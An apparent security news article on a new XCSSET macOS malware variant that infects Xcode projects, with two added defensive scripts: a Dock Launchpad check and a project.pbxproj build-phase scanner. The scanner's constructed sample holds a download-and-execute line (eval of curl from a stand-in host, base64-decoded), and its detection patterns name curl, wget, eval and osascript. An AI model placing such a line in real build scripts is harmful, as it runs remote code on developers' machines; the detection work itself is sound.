XCSSET macOS Malware

Microsoft said it has discovered a new variant of a known Apple macOS malware called XCSSET as part of limited attacks in the wild.

"Its first known variant since 2022, this latest XCSSET malware features enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies," the Microsoft Threat Intelligence team said in a post shared on X.

"These enhanced features add to this malware family's previously known capabilities, like targeting digital wallets, collecting data from the Notes app, and exfiltrating system information and files."

XCSSET is a sophisticated modular macOS malware that's known to target users by infecting Apple Xcode projects. It was first documented by Trend Micro in August 2020.

Subsequent iterations of the malware have been found to adapt to compromise newer versions of macOS as well as Apple's own M1 chipsets. In mid-2021, the cybersecurity company noted that XCSSET had been updated to exfiltrate data from various apps like Google Chrome, Telegram, Evernote, Opera, Skype, WeChat, and Apple first-party apps such as Contacts and Notes.


Another report from Jamf around the same time revealed the malware's ability to exploit CVE-2021-30713, a Transparency, Consent, and Control (TCC) framework bypass bug, as a zero-day to take screenshots of the victim's desktop without requiring additional permissions.

Then, over a year later, it was updated again to add support for macOS Monterey. As of writing, the origins of the malware remain unknown.

The latest findings from Microsoft mark the first major revision since 2022. The new variant uses improved obfuscation to hamper analysis and updated persistence mechanisms, including a hook in the user's zsh startup file, so that the payload is launched every time a new shell session is started.

A second, novel persistence method involves downloading a signed copy of the dockutil utility from a command-and-control server and using it to manipulate the Dock's items.

"The malware then creates a fake Launchpad application and replaces the legitimate Launchpad's path entry in the dock with this fake one," Microsoft said. "This ensures that every time the Launchpad is started from the dock, both the legitimate Launchpad and the malicious payload are executed."
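One defensive check that follows from the Dock technique described above is to confirm that any Dock tile labelled "Launchpad" still resolves to Apple's own Launchpad.app. The script below is an added example, not code from Microsoft's analysis: it reads the user's com.apple.dock preferences (the `persistent-apps` / `tile-data` / `file-data` / `_CFURLString` layout is the standard Dock plist structure), and treats the two historical system locations of Launchpad.app as the only legitimate targets (an assumption). The sample Dock contents are constructed, with one genuine tile and one swapped-in fake.

```python
"""Flag a Dock 'Launchpad' tile pointing anywhere other than Apple's Launchpad.app.

Added example (not from the original write-up). Run with --live on macOS to
inspect the current user's Dock; without it the constructed sample is used.
"""
import plistlib
import subprocess
import sys
from urllib.parse import unquote, urlparse

# Assumption: Launchpad.app lives here on 10.15+ (first) and on older releases (second).
LEGIT_LAUNCHPAD = {"/System/Applications/Launchpad.app", "/Applications/Launchpad.app"}


def tile_path(tile):
    """Return the filesystem path a Dock tile points at, or None if it has none."""
    url = tile.get("tile-data", {}).get("file-data", {}).get("_CFURLString")
    if not url:
        return None
    if url.startswith("file://"):
        url = unquote(urlparse(url).path)
    return url.rstrip("/")


def suspicious_launchpad_tiles(dock_plist):
    """Return (label, path) for tiles that present as Launchpad but live elsewhere."""
    findings = []
    for tile in dock_plist.get("persistent-apps", []):
        data = tile.get("tile-data", {})
        label = data.get("file-label", "")
        bundle = data.get("bundle-identifier", "")
        looks_like_launchpad = label == "Launchpad" or bundle == "com.apple.launchpad.launcher"
        path = tile_path(tile)
        if looks_like_launchpad and path is not None and path not in LEGIT_LAUNCHPAD:
            findings.append((label, path))
    return findings


def load_live_dock_plist():
    """Read the current user's Dock configuration as a plist (macOS only)."""
    out = subprocess.run(
        ["defaults", "export", "com.apple.dock", "-"], check=True, capture_output=True
    ).stdout
    return plistlib.loads(out)


# Constructed sample: a genuine Launchpad tile followed by a fake one in a user-writable path.
SAMPLE_DOCK = {
    "persistent-apps": [
        {"tile-data": {"file-label": "Launchpad",
                       "file-data": {"_CFURLString": "file:///System/Applications/Launchpad.app/",
                                     "_CFURLStringType": 15}}},
        {"tile-data": {"file-label": "Launchpad",
                       "file-data": {"_CFURLString": "file:///Users/dev/Library/Launchpad.app/",
                                     "_CFURLStringType": 15}}},
    ]
}

if __name__ == "__main__":
    live = sys.platform == "darwin" and "--live" in sys.argv
    plist = load_live_dock_plist() if live else SAMPLE_DOCK
    hits = suspicious_launchpad_tiles(plist)
    for label, path in hits:
        print(f"[!] Dock tile {label!r} resolves to {path}")
    if not hits:
        print("No Launchpad tile outside the known system locations.")
```

The check is deliberately narrow: it does not try to recognise the fake application itself, only the redirection of a trusted Dock entry, which is the part of the technique a user would never notice from the Dock's appearance.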

Given that XCSSET spreads through infected projects and runs when a project is built, users are recommended to inspect and verify any Xcode project downloaded or cloned from a repository before building it, paying attention not only to the source files but also to the project configuration (project.pbxproj), where build-time scripts are defined. It is also advised to install apps only from trusted sources, such as a software platform's official app store.

Update

In a follow-up analysis published on March 11, 2025, Microsoft said the XCSSET malware features "enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies" that allow it to steal and exfiltrate files and system and user information, such as digital wallet data and notes.

"XCSSET is known for infecting Xcode projects and runs while an Xcode project is being built," Microsoft Threat Intelligence said. "Since Xcode is typically used by software developers, we assess that the malware's mode of infection and propagation leverages on the idea that project files are shared among developers building Apple or macOS-related applications."

Other changes include a modular approach, improved error handling, and the use of three distinct persistence techniques, which ensure the payload is launched whenever a new shell session starts, whenever a user is tricked into opening the fake Launchpad application, or whenever the user makes a Git commit.

Another significant change is a new infection method, that is, a change in where the malware places its payload within a target Xcode project. Further evidence suggests that some of the modules are under active development, indicating that the threat actors behind the malware are refining their tools and tradecraft.

The attack chain is a four-step process -

  • The execution of a shell payload when a user unknowingly builds an infected Xcode project, which then downloads an obfuscated shell command
  • The execution of the shell command, which is designed to collect and transmit operating system information to an external server and fetch an additional shell script payload
  • The execution of the shell script, which checks whether the device's XProtect version (macOS's built-in signature-based malware scanner) is less than 5287, a gate consistent with avoiding hosts whose signatures already cover the malware, and then creates an AppleScript-compiled application using osacompile
  • The execution of the created AppleScript application, which, in turn, runs a shell command to obtain the final-stage AppleScript, which is responsible for collecting system information and launching various sub-modules

The list of sub-modules is as follows -

  • seizecj, which steals system information
  • fpzfcieoci, which lists web browser extensions installed on the machine across Brave, Google Chrome (and its Canary and Beta versions), Microsoft Edge, Mozilla Firefox, and Opera
  • hxasoxtfd, which downloads an additional module from a command-and-control (C2) server
  • txzx_vostfdi, which steals data from digital wallet browser extensions like MetaMask, TokenPocket, TronLink, BNB Chain Wallet, and Phantom Wallet
  • hfdieiz, which establishes persistence using two methods, zshrc and Dock
  • cozfi_xhh, which steals data from the Apple Notes application
  • vectfd_xhh, which refers to a common module that's used to launch a fake application for loading the main module
  • dfhsebxzod, which infects Xcode projects
  • jez, which establishes persistence through Git commits
  • uhsoxtfd_vostfd, which exfiltrates files from a specified target folder (assessed to be under development)
  • fpfb, which enumerates and exfiltrates directory listings (assessed to be under development)
  • vectfd, which exfiltrates files matching a specific pattern (assessed to be under development)

"The new XCSSET variant obfuscated its module names, making it difficult to determine the modules’ intent during static analysis. Its enhanced obfuscation techniques extend to its randomized approach for generating payloads to infect Xcode projects and for encoding its payloads," Microsoft said.
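Because the payload is randomised and encoded, as the quote above notes, matching a fixed string in an Xcode project will not find it. What does not change is that anything running during a build has to be reachable from something Xcode executes, and the Run Script build phases in project.pbxproj are the most direct such hook (the variant's new placement means this is a starting point for the review recommended earlier, not a complete detector). The scanner below is an added example, not Microsoft's code: it pulls every `PBXShellScriptBuildPhase` out of a pbxproj, unescapes the `shellScript` string, and reports phases that fetch over the network, decode blobs, eval or pipe into a shell, call osascript/osacompile, touch hidden or temporary paths, use a non-standard interpreter, or carry a long opaque token. The indicator list is the author's assumption of what merits a human look; the sample project text is constructed.

```python
"""Triage Run Script build phases in an Xcode project.pbxproj.

Added example (not from the original article). Usage:
    python3 scan_pbxproj.py MyApp.xcodeproj/project.pbxproj
Without an argument it scans the constructed SAMPLE below.
"""
import re
import sys

PHASE_RE = re.compile(r"(\w+) /\* ([^*]*) \*/ = \{\s*isa = PBXShellScriptBuildPhase;")
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";')
SHELL_RE = re.compile(r"shellPath = ([^;]+);")
ISA_RE = re.compile(r"\bisa = ")  # start of the next object; bounds our search
OPAQUE_RE = re.compile(r"[A-Za-z0-9+/=]{120,}")  # long unbroken base64-ish blob
STANDARD_SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh"}

# Assumed indicators: behaviours a benign build script rarely needs, not malware signatures.
INDICATORS = {
    "network fetch": re.compile(r"\b(curl|wget)\b"),
    "decoder": re.compile(r"base64\s+(-[dD]|--decode)|xxd\s+-r|openssl\s+enc\s+-d"),
    "dynamic eval": re.compile(r"\beval\b|\|\s*(sh|bash|zsh)\b|osascript|osacompile"),
    "hidden/temp path": re.compile(r"/tmp/|/\.[A-Za-z0-9_]+"),
}
_ESC = {"n": "\n", "t": "\t", "r": "\r"}


def unescape(s):
    """Undo pbxproj string escaping (\\n, \\t, \\\", \\\\)."""
    return re.sub(r"\\(.)", lambda m: _ESC.get(m.group(1), m.group(1)), s, flags=re.S)


def scan_pbxproj(text):
    """Return a list of dicts describing build phases with at least one indicator hit."""
    findings = []
    for m in PHASE_RE.finditer(text):
        nxt = ISA_RE.search(text, m.end())
        bound = nxt.start() if nxt else len(text)  # keep fields inside this object
        script_m = SCRIPT_RE.search(text, m.end(), bound)
        if not script_m:
            continue
        script = unescape(script_m.group(1))
        shell_m = SHELL_RE.search(text, m.end(), bound)
        shell = shell_m.group(1).strip().strip('"') if shell_m else "?"
        hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
        if OPAQUE_RE.search(script):
            hits.append("opaque blob")
        if shell not in STANDARD_SHELLS:
            hits.append("non-standard interpreter")
        if hits:
            findings.append({"id": m.group(1), "name": m.group(2), "shell": shell,
                             "hits": hits, "script": script})
    return findings


# Constructed sample: a benign version-bump phase and a downloader/decoder stage.
SAMPLE = r'''
// !$*UTF8*$!
{
	objects = {
		A1 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "# Bump build number\nagvtool next-version -all\n";
		};
		B2 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "eval \"$(curl -fsSL https://example.invalid/s | base64 -D)\"\n";
		};
	};
}
'''

if __name__ == "__main__":
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE
    for f in scan_pbxproj(text):
        print(f"[!] phase {f['id']} ({f['name']}, {f['shell']}): {', '.join(f['hits'])}")
        print("    " + f["script"].strip().replace("\n", "\n    "))
```

Run it against every project.pbxproj in a freshly cloned repository before the first build; a clean result only says the Run Script phases look ordinary, so the rest of the project configuration still deserves a look given that the variant moves its payload around.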

(The story was updated after publication to include additional analysis of the malware.)

